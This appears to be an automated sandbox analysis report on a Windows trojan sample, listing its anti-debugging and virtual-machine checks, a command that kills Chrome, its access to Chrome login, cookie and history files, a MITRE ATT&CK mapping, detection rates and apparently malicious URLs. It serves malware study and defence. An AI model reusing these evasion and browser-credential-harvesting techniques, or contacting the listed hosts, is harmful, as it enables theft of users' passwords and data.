Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\

Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.372974513.0000000003EE1000.00000004.00000001.sdmp	Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.435810988.0000000003EE3000.00000004.00000001.sdmp	Binary or memory string: Microsoft Hyper-V Generation CounterSystemACPI
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.354220251.000000000074A000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllX
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.437667421.00000000021EC000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.369845162.00000000029DC000.00000004.00000001.sdmp	Binary or memory string: Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.354177238.0000000002C81000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000003.356504806.0000000002CC1000.00000004.00000001.sdmp	Binary or memory string: NetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueue
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.354308871.0000000002CAD000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000003.356638166.00000000029D9000.00000004.00000001.sdmp	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.372974513.0000000003EE1000.00000004.00000001.sdmp	Binary or memory string: NetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.366902451.000000000019B000.00000004.00000010.sdmp	Binary or memory string: VMware Virtual disk 2.0
Source: ecv5AA4.tmp.11.dr	Binary or memory string: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:BE8AB8DF-DCD1-3523-4A95-3A04EAFF1CBA&ctry=US&time=20200930T152707Z&lc=en-US&pl=en-US&idtp=mid&uid=b029da70-c67b-4a7e-9bd5-517f7e302ed9&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=0b92160dd3c5481e9e32e6096321eb20&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=663574&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=663574&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.366902451.000000000019B000.00000004.00000010.sdmp	Binary or memory string: VMware
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.354357910.00000000021E9000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000003.356638166.00000000029D9000.00000004.00000001.sdmp	Binary or memory string: {72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.354308871.0000000002CAD000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.369921364.0000000002CED000.00000004.00000001.sdmp	Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueueSWDMicrosoft Print to PDF{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.376977232.0000000003F25000.00000004.00000001.sdmp	Binary or memory string: {4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}p

Source: C:\Users\user\AppData\Roaming\1618258522437.exe

Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Code function: 0_2_1001A050 GetCurrentProcess,CheckRemoteDebuggerPresent,

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Thread information set: HideFromDebugger

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Process queried: DebugPort
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Process queried: DebugPort
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Process queried: DebugObjectHandle
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Process queried: DebugFlags

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Code function: 0_2_1000F05C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Code function: 0_2_00408D68 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_00404E19 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10019E40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10019ED0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10019ED0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10019F30 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10019E40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10019ED0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10019ED0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10019F30 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Code function: 0_2_1000E96E GetProcessHeap,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,__heap_term,__RTC_Initialize,GetCommandLineA,___crtGetEnvironmentStringsA,__ioinit,__mtterm,__setargv,__setenvp,__cinit,__ioterm,

Source: C:\Windows\SysWOW64\taskkill.exe

Process token adjusted: Debug

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_1000F05C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_100153B4 SetUnhandledExceptionFilter,__encode_pointer,
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_100153D6 __decode_pointer,SetUnhandledExceptionFilter,
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10018473 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_1000E4AD _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_1000F05C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_100153B4 SetUnhandledExceptionFilter,__encode_pointer,
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_100153D6 __decode_pointer,SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10018473 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_1000E4AD _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 27_2_00B9461F SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 27_2_00B91C57 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 27_2_00B9373A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 27_2_00B9631F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Code function: 0_2_1001A150 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateMutexA,GetLastError,

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Code function: 0_2_100177FF cpuid

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: GetLocaleInfoA,

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Code function: 0_2_100197E0 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA,

Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Code function: 0_2_100152B4 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Code function: 0_2_00401000 GetVersionExA,GetVersionExA,GetVersionExA,GetVersionExA,

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\hihistory
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Replication Through Removable Media1	Windows Management Instrumentation1	DLL Side-Loading1	DLL Side-Loading1	Disable or Modify Tools1	OS Credential Dumping1	System Time Discovery11	Replication Through Removable Media1	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Application Shimming1	Application Shimming1	Deobfuscate/Decode Files or Information1	Input Capture1	Peripheral Device Discovery11	Remote Desktop Protocol	Man in the Browser1	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Browser Extensions1	Process Injection11	Obfuscated Files or Information2	Security Account Manager	File and Directory Discovery3	SMB/Windows Admin Shares	Data from Local System1	Automated Exfiltration	Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Bootkit1	Logon Script (Mac)	Install Root Certificate2	NTDS	System Information Discovery57	Distributed Component Object Model	Input Capture1	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing1	LSA Secrets	Query Registry2	SSH	Clipboard Data1	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	DLL Side-Loading1	Cached Domain Credentials	Security Software Discovery451	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Masquerading1	DCSync	Virtualization/Sandbox Evasion13	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Virtualization/Sandbox Evasion13	Proc Filesystem	Process Discovery3	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection11	/etc/passwd and /etc/shadow	Remote System Discovery11	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Bootkit1	Network Sniffing	System Network Configuration Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	75%	Virustotal		Browse
SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	28%	Metadefender		Browse
SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	65%	ReversingLabs	Win32.Trojan.Vigorf
SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	28%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	65%	ReversingLabs	Win32.Trojan.Vigorf
C:\Users\user\AppData\Local\Temp\MSI39DD.tmp	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\MSI39DD.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe	8%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	3%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	2%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\atl71.dll	3%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\atl71.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll	3%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\download_user.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\download_user.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\msvcp71.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\msvcp71.dll	3%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\msvcr71.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\msvcr71.dll	3%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\zlib1.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\zlib1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\xldl.dll	3%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\xldl.dll	0%	ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://back19e64ea00d6ecfe1.io/N	0%	Avira URL Cloud	safe
http://BDC347C728B2D94D.com/l	0%	Avira URL Cloud	safe
http://9ED2FEEA30C3CC5D.com/info_old/dddio	0%	Avira URL Cloud	safe
http://BDC347C728B2D94D.com/g	0%	Avira URL Cloud	safe
http://84b5a35d6e5335ef.com/info_old/w	0%	Avira URL Cloud	safe
http://back19e64ea00d6ecfe1.io/e7	0%	Avira URL Cloud	safe
http://61D53B5A4BC1AB86.com/info_old/dddmX	0%	Avira URL Cloud	safe
https://deff.nelreports.net/api/report?cat=msn	0%	URL Reputation	safe
https://deff.nelreports.net/api/report?cat=msn	0%	URL Reputation	safe
https://deff.nelreports.net/api/report?cat=msn	0%	URL Reputation	safe
http://back19e64ea00d6ecfe1.io/info_old/w	0%	Avira URL Cloud	safe
http://61D53B5A4BC1AB86.com/info_old/ddd	0%	Avira URL Cloud	safe
http://BDC347C728B2D94D.com/	0%	Avira URL Cloud	safe
https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.js	0%	Avira URL Cloud	safe
